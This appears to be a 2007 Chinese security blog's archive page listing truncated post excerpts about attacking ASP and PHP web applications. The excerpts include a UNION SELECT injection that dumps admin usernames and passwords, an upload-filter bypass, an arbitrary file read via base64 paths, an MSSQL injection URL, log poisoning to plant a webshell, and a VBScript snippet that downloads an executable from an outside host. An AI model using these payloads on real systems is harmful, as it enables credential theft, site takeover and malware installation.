2007年6月11日
摘要: + News.asp?click=1&shu=20 1 as NewsID,username as title,3 as updatetime,passwd as click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin union select top 2后台“图文管理”里添加文章... 阅读全文
posted @ 2007-06-11 16:41 %5C 阅读(621) 评论(0) 推荐(0) 编辑
摘要: 原理 : Reg/User_RegCheck.asp 用户名只过滤 cdx,cer,asp,asa突破的前提条件是 : 服务器是win2003 全功能的空间**************************************************'函数名:UserNamefilter('作 用:过滤用户名(增强过滤,用户名现用于建立个人文集目录)'*************... 阅读全文
posted @ 2007-06-11 16:38 %5C 阅读(2631) 评论(0) 推荐(0) 编辑
摘要: showpic.php str=$_SERVER['QUERY_STRING'];$img=base64_decode($str);$codelen=strlen($safeguard);//获取附加码长度$img=substr($img,$codelen); //去掉附加码readfile($img);提交的参数经过base64编码后直接用readfile读文件,所以可以把路径base64编码后... 阅读全文
posted @ 2007-06-11 16:37 %5C 阅读(347) 评论(0) 推荐(0) 编辑
摘要: 受影响系统:新云网站管理系统最新版发现人的BLOG:http://sobiny.cn发现日期:2006年10月中旬发布日期:2007年6月上旬安全综述:新云网站管理系统是一个采用ASP和MSSQL等其他多种数据库生成静态页面构建的高效网站解决方案。漏洞描述:先看const.asp的GetUserTodayInfo过程。QUOTE:Lastlogin = Request.Cookies("newas... 阅读全文
posted @ 2007-06-11 16:35 %5C 阅读(1942) 评论(0) 推荐(0) 编辑
  2007年6月9日
摘要: 太恐怖,这可能引起一系列的问题,包括玉米劫持、社会工程学拿密码等等 阅读全文
posted @ 2007-06-09 17:28 %5C 阅读(1057) 评论(0) 推荐(0) 编辑
摘要: Set xPost=createObject("Microsoft.XMLHTTP")xPost.Open "GET","http://www.gwlz.cn/100.exe",0xPost.Send()Set sget=createObject("ADODB.Stream")sget.Mode=3sget.Type=1 sget.opensget.write xpost.responseB... 阅读全文
posted @ 2007-06-09 17:16 %5C 阅读(513) 评论(0) 推荐(0) 编辑
  2007年6月8日
摘要: User/upload.asp?dialogtype=UserBlogpic&size=5 NewComment.asp?ChannelID=1&ModuleName=Article A on C.InfoID=A.ArticleID where A.ChannelID=1 and 1=1 ';mssql语句-- 阅读全文
posted @ 2007-06-08 12:25 %5C 阅读(173) 评论(0) 推荐(0) 编辑
  2007年6月7日
摘要: http://www.exp.com/index.php这样的GET请求,将一句话木马写入web日志,然后利用文件包含漏洞包含日志得到WEBSHELL,如milw0rm上的这个EXP:http://www.milw0rm.com/exploits/4029不过很遗憾,这类情况只能在short_open_tag=on的情况下才能有效,当short_open_tag=off时,PHP将不支持这样的短语... 阅读全文
posted @ 2007-06-07 11:51 %5C 阅读(480) 评论(0) 推荐(0) 编辑
摘要: ";echo "Editor By:Ivory AT 77169.com";echo "";echo "";echo "=========================================================================";foreach($script_array as $value) {$fuckurl=$baseurl.$value;$temp=... 阅读全文
posted @ 2007-06-07 11:43 %5C 阅读(436) 评论(0) 推荐(0) 编辑
  2007年6月6日
摘要: 对于缺乏网络安全意识的网络管理员,在配置windows服务器时往往只是让web服务器能工作起来,并且打了一些常见的补丁,就认为这个服务器是很安全的了。其实也不然,当他没有注重ftp的匿名登陆的危险时,就可能产生严重漏洞。(关于此危险请参考我发表的一篇文章《关于www.apache.org被入侵的联想》)下面我们将以一个... 阅读全文
posted @ 2007-06-06 22:08 %5C 阅读(3956) 评论(0) 推荐(0) 编辑